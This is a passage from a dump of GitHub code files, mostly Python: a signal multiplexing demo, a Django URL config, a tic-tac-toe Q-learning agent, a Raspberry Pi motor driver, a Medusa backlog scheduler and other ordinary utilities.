schedule\nschedule.every(config['get_price_intervals']).minutes.do(collect_prices)\nwhile True:\n schedule.run_pending()\n sleep(1)","repo_name":"erfan-mehraban/taxi-rent-data-collector","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40717320071","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport Transmisor\nimport Receptor\n\ndef generarSeno(t, f, A):\n return A * np.sin(2 * np.pi * f * t)\n\n#Armado de señales de prueba\nfs = 100\nA = 1\nd = 1\n\nt = np.linspace(0, d, fs * d)\n\nf1 = 200\nseñal1 = generarSeno(t, f1, A)\n\nf2 = 300\nseñal2 = generarSeno(t, f2, A)\n\nf3 = 500\nseñal3 = generarSeno(t, f3, A)\n\nseñales = [señal1, señal2, señal3]\n\n#Grafico las 3 señales\nfig, (ax1, ax2, ax3) = plt.subplots(3, 1)\n\nax1.stem(t, señal1, 'r', markerfmt = ' ')\nax1.set_title('Señal 1, Frecuencia 200 Hz')\nax1.set_ylabel('Amplitud (A)')\nax1.set_xlabel('Tiempo (t)')\n\nax2.stem(t, señal2, 'y', markerfmt = ' ')\nax2.set_title('Señal 2, Frecuencia 300 Hz')\nax2.set_ylabel('Amplitud (A)')\nax2.set_xlabel('Tiempo (t)')\n\nax3.stem(t, señal3, 'b', markerfmt = ' ')\nax3.set_title('Señal 3, Frecuencia 500 Hz')\nax3.set_ylabel('Amplitud (A)')\nax3.set_xlabel('Tiempo (t)')\n\nfig.tight_layout(pad=0.8)\n\nplt.show()\n\n#Transmitiendo señal\nseñalMultiplexada = Transmisor.multiplexarSeñal(señales)\n\n#Grafico la señal multiplexada \ncantCanales = len(señales) #3\ndTotal = d * cantCanales\ntCanal = np.linspace(0, dTotal, fs * dTotal)\n\nplt.figure(figsize=(12,2))\nplt.stem(tCanal[0::3], señalMultiplexada[0::3], 'r', markerfmt = ' ')\nplt.stem(tCanal[1::3], señalMultiplexada[1::3], 'y', markerfmt = ' ')\nplt.stem(tCanal[2::3], señalMultiplexada[2::3], 'b', markerfmt = ' ')\nplt.title('Señal multiplexada')\nplt.ylabel('Amplitud (A)')\nplt.xlabel('Tiempo (t)')\n\nplt.show()\n\n#recibiendo señal \nseñalDemultiplexada = Receptor.demultiplexarSeñal(señalMultiplexada, cantCanales)\n\n#Grafico las señales demultiplexadas\nfig, (ax1, ax2, ax3) = plt.subplots(3, 1)\n\nsenal1_demultiplexada = señalDemultiplexada[0]\nax1.stem(t, senal1_demultiplexada, 'r', markerfmt = ' ')\nax1.set_title('Señal 1 demultiplexada')\nax1.set_ylabel('Amplitud (A)')\nax1.set_xlabel('Tiempo (t)')\n\nsenal2_demultiplexada = señalDemultiplexada[1]\nax2.stem(t, senal2_demultiplexada, 'y', markerfmt = ' ')\nax2.set_title('Señal 2 demultiplexada')\nax2.set_ylabel('Amplitud (A)')\nax2.set_xlabel('Tiempo (t)')\n\nsenal3_demultiplexada = señalDemultiplexada[2]\nax3.stem(t, senal3_demultiplexada, 'b', markerfmt = ' ')\nax3.set_title('Señal 3 demultiplexada')\nax3.set_ylabel('Amplitud (A)')\nax3.set_xlabel('Tiempo (t)')\n\nfig.tight_layout(pad=0.8)\n\nplt.show()","repo_name":"plopez90/procesamiento-senales-untref2022","sub_path":"TP_final-2022/Prueba_señal_seno.py","file_name":"Prueba_señal_seno.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35160325892","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name='index'),\n path(\"eng/\", views.eng_index, name='eng_index'),\n path(\"ru/\", views.ru_index, name='ru_index'),\n path(\"elmuse/\", views.elmuse, name='elmuse'),\n\n]","repo_name":"Dalalaler/project","sub_path":"src/home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"39422297498","text":"from gi.repository import (EosCompanionAppService, GLib)\n\nBYTE_CHUNK_SIZE = 256\n\nLOAD_FROM_ENGINE_SUCCESS = 0\nLOAD_FROM_ENGINE_NO_SUCH_CONTENT = 1\n\n\ndef load_record_blob_from_shards(shards, content_id, attr):\n '''Load a blob for an app and content_id if given a set of shards.'''\n if attr not in ('data', 'metadata'):\n raise RuntimeError('attr must be one of \"data\" or \"metadata\"')\n\n for shard in shards:\n record = shard.find_record_by_hex_name(content_id)\n\n if not record:\n continue\n\n return LOAD_FROM_ENGINE_SUCCESS, getattr(record, attr)\n\n return LOAD_FROM_ENGINE_NO_SUCH_CONTENT, None\n\n\ndef load_record_from_shards_async(shards,\n content_id,\n attr,\n callback):\n '''Load bytes from stream for app and content_id.\n\n :attr: must be one of 'data' or 'metadata'.\n\n Once loading is complete, callback will be invoked with a GAsyncResult,\n use EosCompanionAppService.finish_load_all_in_stream_to_bytes\n to get the result or handle the corresponding error.\n\n Returns LOAD_FROM_ENGINE_SUCCESS if a stream could be loaded,\n LOAD_FROM_ENGINE_NO_SUCH_CONTENT if the content wasn't found.\n '''\n def _callback(_, result):\n '''Marshal the GAsyncReady callback into an (error, data) callback.'''\n try:\n bytes_data = EosCompanionAppService.finish_load_all_in_stream_to_bytes(result)\n except GLib.Error as error:\n callback(error, None)\n return\n\n callback(None, bytes_data)\n\n status, blob = load_record_blob_from_shards(shards,\n content_id,\n attr)\n\n if status == LOAD_FROM_ENGINE_NO_SUCH_CONTENT:\n GLib.idle_add(\n lambda: callback(\n GLib.Error(\n 'EKN ID {} not found in shards'.format(content_id),\n GLib.quark_to_string(EosCompanionAppService.error_quark()),\n EosCompanionAppService.Error.INVALID_CONTENT_ID\n ),\n None\n )\n )\n return\n\n EosCompanionAppService.load_all_in_stream_to_bytes(blob.get_stream(),\n chunk_size=BYTE_CHUNK_SIZE,\n cancellable=None,\n callback=_callback)\n","repo_name":"endlessm/eos-companion-app-integration","sub_path":"eoscompanion/ekn_data.py","file_name":"ekn_data.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"40308778754","text":"import numpy as np\nimport random\nimport os\n\nclass TicTacToe:\n def __init__(self):\n self.board = None\n self.current_state = None\n self.c_learning_rate = 0.1\n self.c_discount_value = 0.9\n self.exploration_rate = 0.3\n self.computer = None\n self.computer_q_table = None\n self.max_position_to_choose = None\n self.max_q_value_to_choose = None\n self.q_table_player_O = None\n self.q_table_player_X = None\n self.previous_action = None\n self.previous_q_value = None\n self.previous_state = None\n self.reward_X = 0\n self.reward_O = 0\n self.c_episodes = 1000000\n\n def save_file(self):\n np.save(\"q_table_player_O.npy\", self.q_table_player_O)\n np.save(\"q_table_player_X.npy\", self.q_table_player_X)\n \n def load_file(self):\n self.q_table_player_X = np.load(\"q_table_player_X.npy\", allow_pickle= True)\n self.q_table_player_O = np.load(\"q_table_player_O.npy\", allow_pickle= True)\n \n def have_file(self):\n if os.path.exists(\"./q_table_player_X\") and os.path.exists(\"./q_table_player_O\"):\n return True\n return False\n \n def update_exploration_rate(self):\n if self.exploration_rate > 0.3:\n self.exploration_rate *= 0.9\n \n def make_environment(self):\n self.board = np.array([['-','-','-'],\n ['-','-','-'],\n ['-','-','-']], dtype = np.str0)\n self.current_state = 19682 #Theo công thức convert, đây là trạng thái bảng rỗng\n \n if not self.have_file():\n self.q_table_player_X = np.random.uniform(low = 0, high = 1, size = [3**9,9])\n self.q_table_player_O = np.random.uniform(low = 0, high = 1, size = [3**9,9])\n else:\n self.load_file()\n \n \n def convert_to_state(self):\n num = 0\n multiplier = 1\n for i in range(3):\n for j in range(3):\n if self.board[i, j] == 'X':\n num += 0 * multiplier\n elif self.board[i, j] == 'O':\n num += 1 * multiplier\n else: # Trường hợp ô trống\n num += 2 * multiplier\n multiplier *= 3\n return num\n \n \n def reset(self):\n self.board = np.array([['-','-','-'],\n ['-','-','-'],\n ['-','-','-']], dtype = np.str0)\n self.current_state = self.convert_to_state() #Trạng thái bảng rỗng\n self.previous_action = None\n self.previous_q_value = None\n self.previous_state = None\n self.reward_O = 0\n self.reward_X = 0\n self.q_table_player_O = None\n self.q_table_player_X = None\n \n def is_winner(self, player):\n #Check row\n for i in range (3):\n win = True\n for j in range (3):\n if self.board[i][j] != player:\n win = False\n break\n if win:\n return True\n \n #Check column\n for i in range(3):\n win = True\n for j in range (3):\n if self.board[j][i] != player:\n win = False\n break\n if win:\n return True\n\n #Check main diagonals\n win = True\n for i in range(3):\n if self.board[i][i] != player:\n win = False\n break\n if win:\n return True\n \n #Check sub diagonals\n win = True\n for i in range(3):\n if self.board[i][3-i-1] != player:\n win = False\n break\n if win:\n return True\n \n return False\n \n def is_draw(self):\n draw = True\n for i in range(3):\n for j in (range(3)):\n if self.board[i][j] == '-':\n draw = False\n return draw\n \n def get_reward_player_X(self):\n if self.is_winner('X'):\n self.reward_X = 1\n self.reward_O = -1\n else:\n self.reward_X = 0\n self.reward_O = 0\n \n def get_reward_player_O(self):\n if self.is_winner('O'):\n self.reward_X = 1\n self.reward_O = -1\n else:\n self.reward_X = 0\n self.reward_O = 0\n \n def get_reward(self):\n self.get_reward_player_X()\n self.get_reward_player_O()\n \n def swap_player(self, player):\n return 'X' if player == 'O' else 'O'\n \n def chooseAction(self, current_state, q_table_player):\n for i in range(9):\n if self.board[i//3][i%3] == '-': \n self.max_q_value_to_choose = q_table_player[current_state][i]\n self.max_position_to_choose = i\n break\n for i in range(9):\n if self.max_q_value_to_choose < q_table_player[current_state][i]:\n if self.board[i//3][i%3] == '-': \n self.max_q_value_to_choose = q_table_player[current_state][i]\n self.max_position_to_choose = i\n return self.max_position_to_choose\n \n def play(self, player):\n \n random_value = random.random()\n action = None\n \n if random_value > self.exploration_rate:\n if player == 'O':\n action = self.chooseAction(self.current_state, self.q_table_player_O)\n current_q_value = self.q_table_player_O[self.current_state][action]\n else:\n action = self.chooseAction(self.current_state, self.q_table_player_X) \n current_q_value = self.q_table_player_X[self.current_state][action]\n else:\n action = random.randint(0,8)\n while self.board[action//3][action%3] != '-':\n action = random.randint(0,8)\n if player == 'O':\n current_q_value = self.q_table_player_O[self.current_state][action]\n else:\n current_q_value = self.q_table_player_X[self.current_state][action]\n \n self.update_exploration_rate()\n self.board[action//3][action%3] = player\n next_q_state = self.convert_to_state()\n \n self.reward_X = 0\n self.reward_O = 0\n self.get_reward()\n if player == 'O':\n new_q_value = (1-self.c_learning_rate)*current_q_value + self.c_learning_rate*(self.reward_O + self.c_discount_value*np.max(self.q_table_player_O[next_q_state]))\n \n #if self.previous_action != None or self.previous_q_value != None or self.previous_state != None:\n if self.reward_O == 1:\n new_q_value = (1-self.c_learning_rate)*self.previous_q_value + self.c_learning_rate*(self.reward_X + self.c_discount_value*np.max(self.q_table_player_X[self.current_state]))\n self.q_table_player_X[self.previous_state][self.previous_action] = new_q_value\n \n \n self.q_table_player_O[self.current_state][action] = new_q_value\n self.previous_state = self.current_state\n self.current_state = next_q_state\n else:\n new_q_value = (1-self.c_learning_rate)*current_q_value + self.c_learning_rate*(self.reward_X + self.c_discount_value*np.max(self.q_table_player_X[next_q_state]))\n \n #if self.previous_action != None or self.previous_q_value != None or self.previous_state != None:\n if self.reward_X == 1:\n new_q_value = (1-self.c_learning_rate)*self.previous_q_value + self.c_learning_rate*(self.reward_O + self.c_discount_value*np.max(self.q_table_player_O[self.current_state]))\n self.q_table_player_O[self.previous_state][self.previous_action] = new_q_value\n \n self.q_table_player_X[self.current_state][action] = new_q_value\n self.previous_state = self.current_state\n self.current_state = next_q_state\n \n self.previous_q_value = current_q_value\n self.previous_action = action\n \n\n def train(self):\n player = 'X'\n episodes = self.c_episodes\n \n for ep in range(episodes):\n player = 'X'\n print(\"Eps = {}\".format(ep))\n \n while True:\n self.play(player)\n if self.is_winner('X') or self.is_winner('O') or self.is_draw():\n self.save_file()\n self.reset()\n self.load_file()\n break\n player = self.swap_player(player)\n\n\n def play_vs_human(self):\n self.reset()\n self.load_file()\n human = input(\"Choose your turn X/O: \")\n if (human == 'X'):\n self.computer = 'O'\n self.computer_q_table = self.q_table_player_O\n else: \n self.computer = 'X'\n self.computer_q_table = self.q_table_player_X\n \n turn = human\n while True:\n if turn == human:\n action = int(input(\"Input position to fix the spot: \"))\n while self.board[action//3][action%3] != '-':\n print(\"The position has filled yet.\")\n action = int(input(\"Input position to fix the spot: \"))\n self.board[action//3][action%3] = human\n self.current_state = self.convert_to_state()\n else:\n action = self.chooseAction(self.current_state, self.computer_q_table)\n self.board[action//3][action%3] = self.computer\n self.current_state = self.convert_to_state()\n \n print(self.board)\n if self.is_winner(human):\n print(\"Human win!\")\n break\n if self.is_winner(self.computer):\n print(\"Computer win!\")\n break\n if self.is_draw():\n print(\"Draw!!!\")\n break\n turn = self.swap_player(turn)\n \nboardgame = TicTacToe()\nboardgame.make_environment()\n#boardgame.train()\nboardgame.play_vs_human()","repo_name":"thangnguyen021203/Tic-Tac-Toe","sub_path":"TicTacToe_qlearning.py","file_name":"TicTacToe_qlearning.py","file_ext":"py","file_size_in_byte":10276,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"41531063738","text":"import RPi.GPIO as GPIO\nimport datetime\nimport time\n\n# Duration of time motor continues to spin after deactivation.\nMOTOR_LAG = datetime.timedelta(seconds = 0.25)\n\nclass PiGpioMotor():\n def __init__(self, pin, rpm):\n self._rpm = rpm\n self._pin = pin\n\n def rotate(self, rotations):\n duration = datetime.timedelta(minutes = rotations / self._rpm)\n if duration > MOTOR_LAG:\n duration = duration - MOTOR_LAG\n\n GPIO.setwarnings(False)\n GPIO.cleanup(self._pin)\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(self._pin, GPIO.OUT)\n GPIO.output(self._pin, GPIO.HIGH)\n GPIO.output(self._pin, GPIO.LOW)\n time.sleep(duration.total_seconds())\n GPIO.output(self._pin, GPIO.HIGH)\n GPIO.cleanup(self._pin)\n","repo_name":"trevorgud/cat-feeder","sub_path":"catfeeder/rpi_motor.py","file_name":"rpi_motor.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"14228556341","text":"import bpy\nimport numpy as np\n\n\ndef import_lights(parent_obj, model_data):\n for i, light_data in enumerate(model_data.light_sources):\n if light_data.mode == 0: # Point\n l_type = \"POINT\"\n light_name = \"PointLamp\" + f'{light_data.light_id}'.rjust(2, '0')\n elif light_data.mode == 2: # Ambient\n l_type = \"AREA\"\n light_name = \"AmbientLamp\"\n elif light_data.mode == 3: # Directional\n l_type = \"SUN\"\n light_name = \"DirLamp\" + f'{light_data.light_id}'.rjust(2, '0')\n elif light_data.mode == 4: # Fog\n l_type = \"AREA\"\n light_name = \"Fog\"\n else:\n assert 0, f\"Unknown light mode enum \\'{light_data.mode}\\'.\"\n\n light = bpy.data.lights.new(light_name, l_type)\n light.energy = light_data.intensity\n light.color = (light_data.red, light_data.green, light_data.blue)\n\n light_obj = bpy.data.objects.new(light_name, light)\n bpy.context.collection.objects.link(light_obj)\n light_obj.parent = parent_obj\n\n # Add data that I don't think Blender can handle\n if light_data.mode == 4:\n light_obj[\"Unknown_Fog_Param\"] = light_data.unknown_fog_param\n light_obj[\"Alpha\"] = light_data.alpha\n\n # Attach it to a bone if it isn't fog\n if light_data.mode != 4:\n light_obj.rotation_euler[0] = -90 * (np.pi/180)\n constraint = light_obj.constraints.new(\"CHILD_OF\")\n constraint.target = bpy.data.objects[f\"{parent_obj.name}_armature\"]\n\n constraint.subtarget = light_data.bone_name\n","repo_name":"Pherakki/Blender-Tools-for-DSCS","sub_path":"BlenderIO/Import/LightImport.py","file_name":"LightImport.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"22"} +{"seq_id":"27749045190","text":"from keras.preprocessing import image\nfrom keras import models\nimport numpy as np\nfrom PIL import Image\n\n\nmodel = models.load_model('./model')\n\ndef load_image(caminho):\n return Image.open(caminho).convert('RGB')\n\ndef formatImage(image):\n image = image.resize((64,64), Image.LINEAR)\n image = image.img_to_array(image)\n image /= 255\n image = np.expand_dims(image, axis = 0)\n return image\n\nnormal_image = load_image('chest_xray_dataset/test/NORMAL/IM-0001-0001.jpeg')\n\nimage_pneumonia = load_image('chest_xray_dataset/test/PNEUMONIA/person1_virus_6.jpeg')\n\nnormal_image = formatImage(normal_image)\nimage_pneumonia = formatImage(image_pneumonia)\n\nnormal_prediction = model.predict(normal_image)\npneumonia_prediction = model.predict(image_pneumonia)\nprint(normal_prediction)\nprint(pneumonia_prediction)\n","repo_name":"kmvbatista/pneumonia-detector","sub_path":"validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"41243026693","text":"from functools import reduce\nfrom logging import getLogger\nimport re\n\nfrom packages.core.scraper.page_objects import JsonPage\n\nfrom .utils.datetime import str_to_datetime\nfrom .utils.teacher import url_to_username\n\nlogger = getLogger('log_print')\n\n\nclass CoursesPage(JsonPage):\n\n def resolve(self):\n \"\"\"Update format of course(state) to match database\n\n Args:\n course (dict): course to transform\n \"\"\"\n if not hasattr(self, '_course'):\n course = self.state\n course['release'] = str_to_datetime(course['release'])\n course['teacher']['username'] = url_to_username(course['teacher'].pop('path'))\n course['teacher']['role'] = 'teacher'\n\n lessons = reduce((lambda memo, cap: memo + cap['lessons']), course.pop('captions'), [])\n course['lessons'] = tuple(filter(lambda lesson: bool(lesson.get('external_id')), lessons))\n for index, lesson in enumerate(course['lessons']):\n lesson['track_number'] = index + 1\n self._course = course\n return self._course\n","repo_name":"jmillandev/platzi-scraper","sub_path":"packages/courses/page_objects.py","file_name":"page_objects.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"74647520377","text":"'''This handles all of the searching and the tracking of word data'''\nimport re\nimport os, sys\nimport json\nimport nltk\nfrom elasticsearch import Elasticsearch\n\n\nes = Elasticsearch([{'host':'localhost', 'port': 9200}])\ntokenizer = nltk.data.load('tokenizers/punkt/english.pickle')\ndocdir = \"docs\"\nHOST = \"127.0.0.1:9200\"\nINDEX = \"docs\"\nTYPE = \"txt\"\n\nclass Words:\n\t'''Handles the word frequencies, the most common words, etc'''\n\tdef __init__(self):\n\t\tself.words = []\n\t\tself.topwords = []\n\t\tself.wordfreq = []\n\t\tself.wordlist = []\n\n\tdef wordListToFreqDict(self):\n\t\t'''Counts the word frequencies for the given text, and compresses it into a dictionary.'''\n\t\tself.wordfreq = [self.wordlist.count(p) for p in self.wordlist]\n\t\tself.words = dict(zip(self.wordlist,self.wordfreq))\n\n\tdef sortFreqDict(self):\n\t\t'''Sorts a dictionary generated by wordListToFreqDict() based on the calculated frequency'''\n\t\taux = [(self.words[key], key) for key in self.words]\n\t\taux.sort()\n\t\taux.reverse()\n\t\tself.words = aux\n\t\t\n\tdef getWords(self, num):\n\t\t'''Gets search results for the {{num}} most common words in the index'''\n\t\tthesewords = self.words[0:num]\n\t\tsearchlist = []\n\t\tfor w in thesewords:\n\t\t\tsearchresults = self.search(w[1])\n\t\t\tfor finding in searchresults:\n\t\t\t\t# Flatten the results so it can be used by datatables\n\t\t\t\tformatted = [w[1], finding[\"_source\"][\"filename\"], self.highlightWord(finding[\"_source\"][\"text\"], w[1])]\n\t\t\t\tsearchlist.append(formatted)\n\t\treturn searchlist\n\t\t\n\tdef search(self, term):\n\t\t'''This performs the search on elasticsearch indexes'''\n\t\tresult = es.search(index=INDEX, doc_type=TYPE, body={\"query\": {\"match\" : {\"text\": term.strip()}}})\n\t\tif result.get('hits') is not None and result['hits'].get('hits') is not None:\n\t\t\thits = result['hits']['hits']\n\t\telse:\n\t\t\thits = {}\n\t\t\n\t\treturn hits\n\t\t\n\tdef highlightWord(self, sentence, word):\n\t\t'''Simple function to highlight a given word and return the result with HTML formatting applied'''\n\t\t\n\t\t# We want to replace the word no matter the capitalisation...\n\t\ttry:\n\t\t\tresults = [m.start() for m in re.finditer(word.lower(), sentence.lower())]\n\t\texcept:\n\t\t\treturn sentence\n\t\t\t\n\t\tif results is None or len(results) == 0:\n\t\t\treturn sentence\n\t\t\t\n\t\t#results = sorted(results, key=int, reverse=True)\n\t\tresults.sort(reverse=True)\n\t\t\n\t\t# Find the search term (case insensitive) and replace it with formatting\n\t\tfor widx in results:\n\t\t\tsentence = sentence[:widx] + \"\" + sentence[widx:widx+len(word)] + \"\" + sentence[widx+len(word):]\n\t\t\n\t\treturn sentence\n\t\t\ndef indexDocs(stopwords):\n\t'''Originally it was planned that Elasticsearch do this, but I couldn't get the analatics to work right, so \n\tI calculated word frequencies this way.'''\n\ttext_docs = []\n\twordfreq = []\n\toverallwords = []\n\tfor f in os.listdir(\"docs\"):\n\t\t# Cycle through files in docs\n\t\tif f.endswith('.txt'):\n\t\t\t# Only handle txt files\n\t\t\tfp = open(os.path.join(docdir, f), encoding='utf8')\n\t\t\tdata = fp.read()\n\t\t\twordlist = data.split()\n\t\t\t\n\t\t\t# Remove any special characters from words\n\t\t\twordlist = [p.translate(dict.fromkeys(map(ord,u',!.-;\"?:'))) for p in wordlist]\n\t\t\tfor w in wordlist:\n\t\t\t\tw = w.strip().lower()\n\t\t\t\tif w in stopwords:\n\t\t\t\t\t# Only add if the words aren't in the \"stopwords\" list\n\t\t\t\t\tcontinue\n\t\t\t\telif len(w) > 0:\n\t\t\t\t\t# Ignore blank strings\n\t\t\t\t\twordfreq.append(wordlist.count(w))\n\t\t\t\t\toverallwords.append(w)\n\treturn overallwords, wordfreq\n\ndef loadStopWords():\n\t# Load stopwords from file\n\twords = []\n\twith open(\"stopwords.txt\", encoding='utf8') as stopfile:\n\t\twords = stopfile.readlines()\n\twords = [x.strip() for x in words]\n\twords = list(filter(None, words))\n\treturn words\n","repo_name":"cyramic/cyramdocumentindex","sub_path":"Words.py","file_name":"Words.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"17546410331","text":"# coding=utf-8\n\n\"\"\"Backlog module.\"\"\"\nfrom __future__ import unicode_literals\n\nimport datetime\nimport logging\nimport threading\nfrom builtins import object\nfrom builtins import str\nfrom uuid import uuid4\n\nfrom medusa import app, db, ui, ws\nfrom medusa.logger.adapters.style import BraceAdapter\nfrom medusa.schedulers import scheduler\nfrom medusa.search.queue import BacklogQueueItem\n\nfrom six import iteritems\n\nlog = BraceAdapter(logging.getLogger(__name__))\nlog.logger.addHandler(logging.NullHandler())\n\n\nclass BacklogSearchScheduler(scheduler.Scheduler):\n \"\"\"Backlog search scheduler class.\"\"\"\n\n def force_search(self):\n \"\"\"Set the last backlog in the DB.\"\"\"\n self.action._set_last_backlog(1)\n self.lastRun = datetime.datetime.fromordinal(1)\n\n def next_run(self):\n \"\"\"Return when backlog should run next.\"\"\"\n if self.action._last_backlog <= 1:\n return datetime.date.today()\n else:\n backlog_frequency_in_days = int(self.action.cycleTime)\n return datetime.date.fromordinal(self.action._last_backlog + backlog_frequency_in_days)\n\n\nclass BacklogSearcher(object):\n \"\"\"Backlog Searcher class.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize the class.\"\"\"\n self._last_backlog = self._get_last_backlog()\n self.cycleTime = app.BACKLOG_FREQUENCY / 60.0 / 24\n self.lock = threading.Lock()\n self.amActive = False\n self.amPaused = False\n self.amWaiting = False\n self.forced = False\n self.currentSearchInfo = {}\n\n self._to_json = {\n 'identifier': str(uuid4()),\n 'name': 'BACKLOG',\n 'queueTime': str(datetime.datetime.utcnow()),\n 'force': self.forced\n }\n\n self._reset_pi()\n\n def _reset_pi(self):\n \"\"\"Reset percent done.\"\"\"\n self.percentDone = 0\n self.currentSearchInfo = {'title': 'Initializing'}\n\n def get_progress_indicator(self):\n \"\"\"Get backlog search progress indicator.\"\"\"\n if self.amActive:\n return ui.ProgressIndicator(self.percentDone, self.currentSearchInfo)\n else:\n return None\n\n def am_running(self):\n \"\"\"Check if backlog is running.\"\"\"\n log.debug(u'amWaiting: {0}, amActive: {1}', self.amWaiting, self.amActive)\n return (not self.amWaiting) and self.amActive\n\n def search_backlog(self, which_shows=None):\n \"\"\"Run the backlog search for given shows.\"\"\"\n if self.amActive:\n log.debug(u'Backlog is still running, not starting it again')\n return\n\n if app.forced_search_queue_scheduler.action.is_forced_search_in_progress():\n log.warning(u'Manual search is running. Unable to start Backlog Search')\n return\n\n self.amActive = True\n self.amPaused = False\n\n if which_shows:\n show_list = which_shows\n else:\n show_list = app.showList\n\n self._get_last_backlog()\n\n cur_date = datetime.date.today().toordinal()\n from_date = datetime.date.fromordinal(1)\n\n if not which_shows and self.forced:\n log.info(u'Running limited backlog search on missed episodes from last {0} days',\n app.BACKLOG_DAYS)\n from_date = datetime.date.today() - datetime.timedelta(days=app.BACKLOG_DAYS)\n else:\n log.info(u'Running full backlog search on missed episodes for selected shows')\n\n # go through non air-by-date shows and see if they need any episodes\n for series_obj in show_list:\n\n if series_obj.paused:\n continue\n\n segments = series_obj.get_wanted_segments(from_date=from_date)\n\n for season, segment in iteritems(segments):\n self.currentSearchInfo = {'title': '{series_name} Season {season}'.format(series_name=series_obj.name,\n season=season)}\n\n backlog_queue_item = BacklogQueueItem(series_obj, segment)\n app.search_queue_scheduler.action.add_item(backlog_queue_item) # @UndefinedVariable\n\n if not segments:\n log.debug(u'Nothing needs to be downloaded for {0!r}, skipping', series_obj.name)\n\n # don't consider this an actual backlog search if we only did recent eps\n # or if we only did certain shows\n if from_date == datetime.date.fromordinal(1) and not which_shows:\n self._set_last_backlog(cur_date)\n\n self.amActive = False\n self._reset_pi()\n\n def _get_last_backlog(self):\n \"\"\"Get the last time backloged runned.\"\"\"\n log.debug(u'Retrieving the last check time from the DB')\n\n main_db_con = db.DBConnection()\n sql_results = main_db_con.select('SELECT last_backlog '\n 'FROM info')\n\n if not sql_results:\n last_backlog = 1\n elif sql_results[0]['last_backlog'] is None or sql_results[0]['last_backlog'] == '':\n last_backlog = 1\n else:\n last_backlog = int(sql_results[0]['last_backlog'])\n if last_backlog > datetime.date.today().toordinal():\n last_backlog = 1\n\n self._last_backlog = last_backlog\n return self._last_backlog\n\n @staticmethod\n def _set_last_backlog(when):\n \"\"\"Set the last backlog in the DB.\"\"\"\n log.debug(u'Setting the last backlog in the DB to {0}', when)\n\n main_db_con = db.DBConnection()\n sql_results = main_db_con.select('SELECT last_backlog '\n 'FROM info')\n\n if not sql_results:\n main_db_con.action('INSERT INTO info (last_backlog, last_indexer) '\n 'VALUES (?,?)', [str(when), 0])\n else:\n main_db_con.action('UPDATE info '\n 'SET last_backlog={0}'.format(when))\n\n def run(self, force=False):\n \"\"\"Run the backlog.\"\"\"\n try:\n if force:\n self.forced = True\n\n # Push an update to any open Web UIs through the WebSocket\n ws.Message('QueueItemUpdate', self._to_json).push()\n self.search_backlog()\n ws.Message('QueueItemUpdate', self._to_json).push()\n\n except Exception:\n self.amActive = False\n raise\n","repo_name":"pymedusa/Medusa","sub_path":"medusa/search/backlog.py","file_name":"backlog.py","file_ext":"py","file_size_in_byte":6406,"program_lang":"python","lang":"en","doc_type":"code","stars":1665,"dataset":"github-code","pt":"22"} +{"seq_id":"35187287754","text":"a=int(input())\nsq=a*a\nsu=0\nwhile sq>0:\n r=sq%10\n su=su+r\n sq=sq//10\nif su==a:\n print(\"Neon Number\")\nelse:\n print(\"Not Neon Number\")\n","repo_name":"soumyalr/codemind-python","sub_path":"Neon_Number.py","file_name":"Neon_Number.py","file_ext":"py","file_size_in_byte":147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"10216025833","text":"from __future__ import division, unicode_literals\n\n__version__ = '$Revision: 1 $'\n# $Source$\n\nfrom numpy import (arcsin, arctan, asarray, cos, cosh, meshgrid, ndarray,\n polyval, sin, sinh, tan, tanh)\nfrom numpy import ma\n\n__all__ = ['fromAtoB']\n\n\ndef fromAtoB(data_in, A, B, vtype=None):\n \"\"\"\n Converts from input data from unit A to unit B.\n\n Parameters\n ----------\n data_in : float, array like\n Input data to be converted.\n A : string\n Input data unit.\n B : string\n Desired output data unit.\n vtype : string, optional\n Determines the type of the variable. If type is `stdev`, no\n offset is applied, only scaling.\n\n Returns\n -------\n data_out : float, array like\n Converted data.\n\n \"\"\"\n #\n #\n if A == B:\n return data_in\n elif (A == 'degC') & (B == 'K'):\n p = [1, 273.15]\n elif (A == 'K') & (B == 'degC'):\n p = [1, -273.15]\n elif (A == 'mbar') & (B == 'Pa'):\n p = [1e2, 0]\n elif (A == 'Pa') & (B == 'mbar'):\n p = [1e-2, 0]\n elif (A == 'hPa') & (B == 'Pa'):\n p = [1e2, 0]\n elif (A == 'Pa') & (B == 'hPa'):\n p = [1e-2, 0]\n elif (A in ['%', '1e-2']) & (B == '1'):\n p = [1e-2, 0]\n elif (A == '1') & (B in ['%', '1e-2']):\n p = [1e2, 0]\n elif (A == '1e-3') & (B == '1'):\n p = [1e-3, 0]\n elif (A == '1') & (B == '1e-3'):\n p = [1e3, 0]\n elif (A == 'ppm') & (B == '1'):\n p = [1e-6, 0]\n elif (A == '1') & (B == 'ppm'):\n p = [1e6, 0]\n elif (A == 'km h-1') & (B == 'm s-1'):\n p = [1./3.6, 0]\n elif (A == 'm s-1') & (B == 'km h-1'):\n p = 